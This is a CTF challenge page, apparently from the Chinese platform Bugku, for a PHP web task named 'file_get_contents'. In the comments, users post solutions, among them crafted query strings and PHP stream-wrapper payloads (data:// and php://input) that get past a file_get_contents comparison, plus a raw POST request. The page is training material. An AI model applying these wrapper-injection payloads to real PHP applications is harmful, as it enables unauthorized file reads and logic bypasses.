file_get_contentsWEB 未解决

分数: 30 金币: 3
题目作者: harry
一  血: npfs
一血奖励: 2金币
解  决: 4652
提  示:
描  述:
file_get_contents????
...
登录回复
评论
Hrkh 3月前
举报

使用dirsearch扫描,找到一个flag.txt打开后里边内容为bugku,传参?ac=bugku&fn=flag.txt得到FLAG

回复 2
zxcvbnmzhang 3月前
举报

?ac=hello&fn=data://text/plain,hello

回复 2
ibuprofen 4月前
举报

?ac=bugku&fn=flag.txt

回复 0
一个姓⎝李⎠的师傅~ 4月前
举报

小白解题思路,包含所有知识点:https://www.yuque.com/u21437924/ap9vtm/gqkc3dcfmfpe5p85?singleDoc#X0GpS

回复 4
六分之杰 4月前
举报

POST /?ac=bugku&fn=flag.txt HOST: Content-Type: application/x-www-form-urlencoded Content-Length: 18 flag_content=bugku

回复 0
laoaos 4月前
举报

flag{********}

回复 0
solomom 4月前
举报

用dirsearch扫描发现恰好有flag.txt文件,里面写了bugku,给我们的fn提供的可读取的文件,所以ac直接传bugku。?fn=./flag.txt&ac=bugku

回复 2
ubudj 4月前
举报

绕过file_get_contents,有两种方法:?ac=1&fn=data://text/wenjian,1 ?ac=1&fn=php://input,再用post输入1

回复 2
wywsssf 4月前
举报

?fn=./flag.txt&ac=bugku

回复 1
2686213396 5月前
举报

data伪协议

回复 0

WriteUp

image
harry

3 金币

立即查看

评分(7)

解题动态

20230302240 攻破了该题 2小时前
20230302241 攻破了该题 4小时前
莫泽明 攻破了该题 7小时前
kklff4399 攻破了该题 1天前
,, 攻破了该题 1天前
黎悦依 攻破了该题 1天前
typ11 攻破了该题 1天前
05su 攻破了该题 1天前
叶子璐 攻破了该题 1天前
潘福演 攻破了该题 1天前
AioKT 攻破了该题 1天前
20230302103 攻破了该题 1天前
longlong 攻破了该题 1天前
HHHHYY 攻破了该题 1天前
0622 攻破了该题 1天前
YTT 攻破了该题 1天前
李心渝 攻破了该题 1天前
张立美 攻破了该题 1天前
党玉新 攻破了该题 1天前
ljjjjj9999 攻破了该题 1天前
问题反馈